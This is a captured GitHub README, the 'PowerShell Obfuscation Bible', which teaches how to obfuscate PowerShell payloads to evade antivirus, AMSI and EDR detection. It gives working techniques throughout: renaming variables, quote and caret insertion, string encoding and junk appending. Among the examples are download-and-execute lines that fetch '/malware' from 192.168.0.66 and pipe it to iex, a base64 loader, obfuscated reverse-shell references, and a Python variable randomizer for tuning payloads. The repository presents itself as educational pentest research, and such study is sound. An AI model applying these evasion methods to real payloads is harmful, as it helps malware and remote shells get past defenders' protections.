t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.

com/t3l3machus/PowerShell-Obfuscation-Bible

t3l3machus / PowerShell-Obfuscation-Bible

Code Issues Pull requests Actions Projects Security Insights

PowerShell-Obfuscation-Bible Public

1 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

2 Branches 0 Tags Go to file About

A collection of techniques,
t3l3machus Update R… ca7cfa9 · 2 months ago 97 Commits
examples and a little bit of theory
for manually obfuscating
LICENSE.md Create LICENSE.md 10 months ago PowerShell scripts to achieve AV
evasion, compiled for educational
README.md Update README.md 2 months ago
purposes. The contents of this
repository are the result of personal
README MIT license research, including reading
materials online and conducting
trial-and-error attempts in labs and

PowerShell Obfuscation Bible pentests.

# obfuscation # powershell # hacking # pentest

# redteam # offensivesecurity

A collection of techniques, examples and a little bit of theory for manually obfuscating PowerShell
Readme scripts to
bypass signature-based detection, compiled for educational purposes. The contents of this repository
MIT licenseare the
result of personal research, including reading materials online and conducting trial-and-error attempts in labs
Activity
and pentests. You should not take anything for granted.
627 stars
YouTube video presentation: youtube.com/watch?v=tGFdmAh_lXE 11 watching

74 forks
Disclaimer: Usage of the techniques and concepts described in this repository for gaining unauthorized
Report
access to systems that you do not have permission to test is illegal. You are responsible for yourrepository
actions.
Don't be evil.
Sponsor this project
Table of Contents
https://www.buymeacoffee.com/…

2 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

1. Entropy
https://ko-fi.com/t3l3machus
2. Identify Detection Triggers
3. Rename Objects https://github.com/sponsors/t3l3…

4. Obfuscate Boolean Values

5. Cmdlet Quote Interruption
6. Cmdlet Caret Interruption
7. Get-Command Technique
8. Substitute Loops
9. Substitute Commands
10. Mess With Strings
11. Append Junk
12. Add or Remove Comments
13. Randomize Char Cases
14. Rearrange Script Components
15. Execute Script line by line

Entropy
The scientific term entropy , which is generally defined as the measure of randomness or disorder of a
system is important in AV evasion. This is because, malware often contains code that is highly randomized,
encrypted and/or encoded (obfuscated) to make it difficult to analyze and therefore detect. As one of various
methods, Anti-virus products use entropy analysis to identify potentially malicious files and payloads.

It is important to understand this concept because, when obfuscating code, you should keep in mind the
entropy variance created by the changes you choose to make. Breaking signatures is easy, but if you don't
pay attention to the entropy level, sophisticated AV/EDRs will see through it.

A principle to keep in mind: The greater the entropy, the more likely the data is obfuscated or encrypted,

3 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

and the more probable the file/payload is malicious. Fortunately, there are ways to lower it.

Claude E. Shannon introduced a formula in his 1948 paper A Mathematical Theory of Communication which
can be used to measure the entropy in a set of data. Here's a simple Python implementation of the Shannon
Entropy you can use to measure the entropy of the payloads you develop:

#!/bin/python3
# Usage: python3 entropy.py <file>

import math, sys

def entropy(string):
"Calculates the Shannon entropy of a UTF-8 encoded string"

# decode the string as UTF-8

unicode_string = string.decode('utf-8')

# get probability of chars in string

prob = [ float(unicode_string.count(c)) / len(unicode_string) for c in
dict.fromkeys(list(unicode_string)) ]

# calculate the entropy

entropy = - sum([ p * math.log(p) / math.log(2.0) for p in prob ])

return entropy

f = open(sys.argv[1], 'rb')
content = f.read()
f.close()

print(entropy(content))

You can also use this online Shannon Entropy calculator or Microsoft's Sigcheck.exe with the -a option.

4 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Identify Detection Triggers

The mature and elegant thing to do before jumping into trial and error obfuscation tests to come up with a
payload variation that is not flagged, is to identify the part(s) in a script that trigger malware detection.
Especially in short scripts like C2 commands, you might be able to make insignificant changes and fly off the
radar on the spot.

A great tool to identify such triggers is AMSItrigger. Here's a usage example with a file containing a malicious
script. The red area signifies the part that obfuscation should be applied:

You could also identify triggers manually by executing a script chunk by chunk.

Rename Objects
When obfuscating scripts, it should be a priority to replace variable/class/function names with random ones.
That way, in combination with other techniques, you will be able to bypass detection easily. But you should
keep in mind the entropy of the payloads you develop. Take in consideration the following standard reverse
shell script that is generally detected by most if not all AVs:

Now consider the following obfuscated version:

5 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

In this version, all variable names have been substituted with 32 chars long random names. I also replaced
(pwd).Path with $(gl) . The payload has a Shannon entropy of 4.96 . At the time of writing this, it is not
detected by MS Defender and a banch of other products:

Now consider this version:

6 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

This variation also has all variable names replaced but this time with names consisting of x number of 'f'
characters, which results in a significant drop of the payload's entropy. I replaced (pwd).Path with $(gl)
here as well. Again, at the time of writing, it is not detected by MS Defender. The payload has a Shannon
entropy of 0.76 .

Both of these variations bypass common AVs, but the second one has a lower entropy and will probably
have a better chance when processed by EDRs and other sophisticated anti-malware engines. I am not
saying that the better performance of the second payload variation in this example is certainly because of the

7 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

entropy level (I can't really know that, it could have been the length or both or who knows what), but it is an
important aspect to have in mind when obfuscating stuff and this example is meant to underline that
concept.

You can use the script below to randomize the names of variables in a PowerShell script. The script is not
perfect! If you run it against large, complex PowerShell scripts it might break their functionality by replacing
stuff it shouldn't. Use it with caution and be mindful.

#!/bin/python3
#
# This script is an example. It is not perfect and you should use it with caution.
# Source: https://github.com/t3l3machus/PowerShell-Obfuscation-Bible
# Usage: python3 randomize-variables.py <path/to/powershell/script>

import re
from sys import argv
from uuid import uuid4

def get_file_content(path):
f = open(path, 'r')
content = f.read()
f.close()
return content

def main():

payload = get_file_content(argv[1])
used_var_names = []

# Identify variables definitions in script

variable_definitions = re.findall('\$[a-zA-Z0-9_]*[\ ]{0,}=', payload)
variable_definitions.sort(key=len)
variable_definitions.reverse()

8 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

# Replace variable names

for var in variable_definitions:

var = var.strip("\n \r\t=")

while True:

new_var_name = uuid4().hex

if (new_var_name in used_var_names) or (re.search(new_var_name,

payload)):
continue

else:
used_var_names.append(new_var_name)
break

payload = payload.replace(var, f'${new_var_name}')

print(payload + '\n')

main()

Obfuscate Boolean Values

It's super fun and easy to replace $True and $False values with other boolean equivalents, which are
literaly unlimited. Especially if you have identified the detection trigger in a given payload and that includes a
$True or $False value, you will probably be able to bypass detection by simply replacing it with a boolean
substitute. All of the examples below evaluate to True . You can reverse them to False by simply adding an
exclamation mark before the expression (e.g., ![bool]0x01 ):

Boolean typecast of literally anything that is not 0 or Null or an empty string , will return True :

9 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

[bool]1254
[bool]0x12AE
[bool][convert]::ToInt32("111011", 2) # Converts a string to int from base 2 (binary)
![bool]$null
![bool]$False
[bool]"Any non empty string"
[bool](-12354893) # Boolean typecast of a negative number
[bool](12 + (3 * 6))
[bool](Get-ChildItem -Path Env: | Where-Object {$_.Name -eq "username"})
[bool]@(0x01BE)
[bool][System.Collections.ArrayList]
[bool][System.Collections.CaseInsensitiveComparer]
[bool][System.Collections.Hashtable]

# Well, you get the point.

Boolean typecast of any class will return True as well:

[bool][bool]
[bool][char]
[bool][int]
[bool][string]
[bool][double]
[bool][short]
[bool][decimal]
[bool][byte]
[bool][timespan]
[bool][datetime]

The result of a comparison that evaluates to True (duh):

(9999 -eq 9999)

10 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

([math]::Round([math]::PI) -eq (4583 - 4580))

[Math]::E -ne [Math]::PI

Or you can just grab a True value from an object's attributes:

$x = [System.Data.AcceptRejectRule].Assembly.GlobalAssemblyCache
$x = [System.TimeZoneInfo+AdjustmentRule].IsAnsiClass
$x = [mailaddress].IsAutoLayout
$x = [ValidateCount].IsVisible

You can mix all this stuff and weird things up by composing hideous ways to state True or False :

[bool](![bool]$null)
[System.Collections.CaseInsensitiveComparer] -ne [bool][datetime]'2023-01-01'
[bool]$(Get-LocalGroupMember Administrators)
!!!![bool][bool][bool][bool][bool][bool]

Cmdlet Quote Interruption

You can obfuscate cmdlets by adding single and/or double quotes in between their characters, as long as it's
not at the beginning. It's super effective! For example, the expresion iex "pwd" can be substituted with:

i''ex "pwd"
i''e''x "pwd"
i''e''x'' "pwd"
ie''x'' "pwd"
iex'' "pwd"
i""e''x"" "pwd"
ie""x'' "pwd"

# and so on... but also:

11 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

i''ex "p''wd"
i''e''x "p''w''d"
i''e''x'' "p''w''d''"
ie''x'' "pw''d`"`""
iex'' "p`"`"w`"`"d`"`""
i""e''x"" "p`"`"w`"`"d''"
ie""x'' "p`"`"w''d`"`""

# You get the point.

Cmdlet Caret Interruption

This is a bit dirty but might come in handy. In a Windows CMD terminal, it is possible to append the caret (^)
symbol in-between a command's characters and it will still be interpreted normally. In a powershell script,
one way to utilize this would be:

cmd /c "who^am^i"

Get-Command Technique
A really cool trick my friend and mighty haxor Karol Musolff (@kmusolff) showed me. You can use Get-
Command (or gcm ) to retrieve the name (string) of any command, including all of the non-PowerShell files in
the Path environment variable ( $env:Path ) by using wildcards. You can then run them as jobs with the &
operator. For example, the following line:

12 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

operator. For example, the following line:

Invoke-RestMethod -uri https://192.168.0.66/malware | iex

Could be obfuscated to:

&(Get-Command i????e-rest*) -uri https://192.168.0.66/malware | &(gcm i*x)

Or even better, this one, that has a lower Shannon entropy value:

&(Get-Command i************************************************************e-rest*) -uri

https://192.168.0.66/malware | &(gcm i*x)

Substitute Loops
There are certain loops that can be substituted with other loop types or functions. For example, a While
($True){ # some code } loop can be substituted with the following:
An infinite For loop

For (;;) { # some code }

A Do-While loop

Do { # some code } While ($true)

A Do-Until loop

Do { # some code } Until (1 -eq 2)

13 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Do { # some code } Until (1 -eq 2)

A recursive function

function runToInfinity {
# do something;
runToInfinity;
}

Append Junk

Add/Remove parameters
You can try adding parameters to a cmdlet. For example, the following line:

iex "whoami"

Could be expanded to:

iex -Debug -Verbose -ErrorVariable $e -InformationAction Ignore -WarningAction Inquire

"whoami"

You may of course try the opposite.

Append random objects

You can "pollute" a script with random variables and functions. Assume the following script as malicious:

$b64 = $(irm -uri http://192.168.0.66/malware);

14 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

$virus = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));
iex $virus;

You might be able to break its signature by doing something like:

$b64 = $(irm -uri http://192.168.0.66/malware); sleep 0.01;sleep 0.01;Get-Process | Out-Null;

$virus =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));sleep
0.01;sleep 0.01;Measure-Object | Out-Null;
iex $virus;

Substitute Commands
You can always look for commands or even whole code blocks in a script that you can substitute with
components that have the same/similar functionality. In the following classic reverse shell script, the pwd
command is used to retrieve the current working directory and reconstruct the shell's prompt value:

The (pwd).Path part can be replaced by the following weird, unorthodox little script and although it even
includes pwd it does serve our purpose of breaking the signature while maintaining the functionality of the
script:

"$($p = (Split-Path `"$(pwd)\\0x00\`");if ($p.trim() -eq ''){echo 'C:\'}else{echo $p})"

There are of course simpler substitutes for pwd like gl , get-location and cmd.exe /c chdir that could do
the trick, especially in combination with other techniques.

15 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Mess With Strings

There's no end to what one can do with strings. Find below some interesting concepts. Examples use the
string 'malware' :

Convert string to here-string

At the expense of adding a few new lines, you can turn a string into a here-string.
This:

$x = 'echo malware';
iex $x;

Is the same as:

$x = 'echo malware';
iex @"
$x
"@

Reverse Strings

$x="Your string reversed".ToCharArray(); [array]::reverse($x); $x -join ""

Concatenation
Pretty straightforward and classic:

16 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

'mal' + 'w' + 'ar' + 'e'

Get string from substring:

Add the desired value between an irrelevant string and use substring() to extract it based on start - end
indexes:

'xxxmalwarexxx'.Substring(3,7)

Replace string by regex match:

Create a junk string and replace it with the desired value via regex matching:

'a123' -replace '[a-zA-Z]{1}[\d]{1,3}','malware'

Base64 decode the desired string:

Encode your string and decode it within the script:

[System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("bWFsd2FyZQ=="))

Get the desired string's chars from bytes:

"$([char]([byte]0x6d)+[char]([byte]0x61)+[char]([byte]0x6c)+[char]([byte]0x77)+[char]
([byte]0x61)+[char]([byte]0x72)+[char]([byte]0x65))"

That's only to get you started. To be continued...

17 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Add or Remove Comments

Appending Comments
Obfuscating a script by appending comments here and there might actually do the trick on its own.
for example, a reverse shell command could be obfuscated like this:

Original (Common r-shell command that is easily detected by AVs)

Modified (appended <# Suspendisse imperdiet lacus eu tellus pellentesque suscipit #> in
various places)

This will not only work, but also lower the payload's Shannon entropy value (given that you don't use
complex random comments).

Removing Comments

18 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

There are malware-ish strings that will trigger AMSI immediately and it should be a priority to replace them,
when obfuscating scripts. Check this out:

Just by typing the string 'invoke-mimikatz' in the terminal AMSI is having a stroke (the script is not even
present / loaded). These strings may be found in comments as well, so it's a good idea to remove them,
especially from FOS resources you grab from the internet (e.g. Invoke-Mimikatz.ps1 from GitHub).

*It's generally a good idea to remove comments. This was just an example.

Randomize Char Cases

Probably the oldest trick in the book. Randomazing the character case of cmdlets and parameters might help:

inVOkE-eXpReSSioN -vErbOse "WHoAmI /aLL" -dEBug

Rearrange Script Components

Sometimes simply moving variables and classes to different locations might work, especially if you have
found the detection trigger and it includes some variable definition that could be taking place somewhere
else, like the beginning of the script.

Execute Script line by line

19 of 20 2/6/2024, 3:05 AM
t3l3machus/PowerShell-Obfuscation-Bible: A collection of techniques, examples and a little bi... https://github.com/t3l3machus/PowerShell-Obfuscation-Bible

Execute Script line by line

Sometimes, it is possible to achieve AV evasion by simply executing a malicious script line by line. This can of
course be challenging to pull off given the circumstances. In case you try it, be aware of script blocks that
have to be executed as a whole (e.g., loops, try-catch blocks, conditional statements, function definitions, etc).
To test this, you can grab a common PowerShell reverse shell script (no obfuscation applied) and execute it
line by line. Does it get flagged? ;)

20 of 20 2/6/2024, 3:05 AM